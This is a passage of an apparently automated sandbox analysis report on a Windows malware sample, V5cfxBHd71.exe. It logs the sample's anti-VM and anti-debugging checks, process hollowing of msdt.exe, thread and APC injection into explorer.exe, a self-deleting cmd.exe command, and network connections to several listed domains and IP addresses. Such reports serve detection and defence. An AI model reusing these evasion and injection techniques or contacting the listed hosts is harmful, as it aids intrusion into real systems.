          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.258210431.000000000335B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: V5cfxBHd71.exe PID: 5700, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: V5cfxBHd71.exe, 00000000.00000002.258210431.000000000335B000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: V5cfxBHd71.exe, 00000000.00000002.258210431.000000000335B000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000A485E4 second address: 0000000000A485EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000A4896E second address: 0000000000A48974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\V5cfxBHd71.exe TID: 5332Thread sleep time: -40589s >= -30000s
          Source: C:\Users\user\Desktop\V5cfxBHd71.exe TID: 456Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 4656Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeThread delayed: delay time: 40589
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000007.00000000.262044183.0000000001218000.00000004.00000020.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oso
          Source: explorer.exe, 00000007.00000000.287538157.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: V5cfxBHd71.exe, 00000000.00000002.258210431.000000000335B000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: V5cfxBHd71.exe, 00000000.00000002.258210431.000000000335B000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: V5cfxBHd71.exe, 00000000.00000002.258210431.000000000335B000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000007.00000000.288154074.0000000008AEA000.00000004.00000001.sdmpBinary or memory string: 000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&
          Source: V5cfxBHd71.exe, 00000000.00000002.258210431.000000000335B000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000007.00000000.299978038.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: V5cfxBHd71.exe, 00000000.00000002.258210431.000000000335B000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000007.00000000.287622387.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000007.00000000.317506996.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000007.00000000.287622387.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: V5cfxBHd71.exe, 00000000.00000002.258210431.000000000335B000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: V5cfxBHd71.exe, 00000000.00000002.258210431.000000000335B000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: V5cfxBHd71.exe, 00000000.00000002.258210431.000000000335B000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_00409B10 LdrLoadDll,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DD8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DD8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DBFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DC14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D3D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D3D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D09080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D9FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D3F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D3F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D3F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DD1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DC2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DBB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DBB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D2746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DBFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D3BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DB8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D2C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D3A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DC138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DD5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D27D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DD8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D1EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D2B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D2B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D43D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D0B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D0B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D2C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D2C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DD8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DC131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D9FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D9FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DD070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DD070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D0AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D3E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DD8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D24120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D04F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D04F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.218 80
          Source: C:\Windows\explorer.exeDomain query: www.tpcgzwlpyggm.mobi
          Source: C:\Windows\explorer.exeDomain query: www.boogerstv.com
          Source: C:\Windows\explorer.exeDomain query: www.m678.xyz
          Source: C:\Windows\explorer.exeDomain query: www.kce0728com.net
          Source: C:\Windows\explorer.exeDomain query: www.vectoroutlines.com
          Source: C:\Windows\explorer.exeDomain query: www.3cheer.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.126.105 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeThread register set: target process: 3472
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3472
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: 1290000
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess created: C:\Users\user\Desktop\V5cfxBHd71.exe C:\Users\user\Desktop\V5cfxBHd71.exe
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\V5cfxBHd71.exe'
          Source: explorer.exe, 00000007.00000000.262162643.0000000001640000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.262162643.0000000001640000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000000.262162643.0000000001640000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000007.00000000.299874410.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000007.00000000.262162643.0000000001640000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000007.00000000.262162643.0000000001640000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Users\user\Desktop\V5cfxBHd71.exe VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
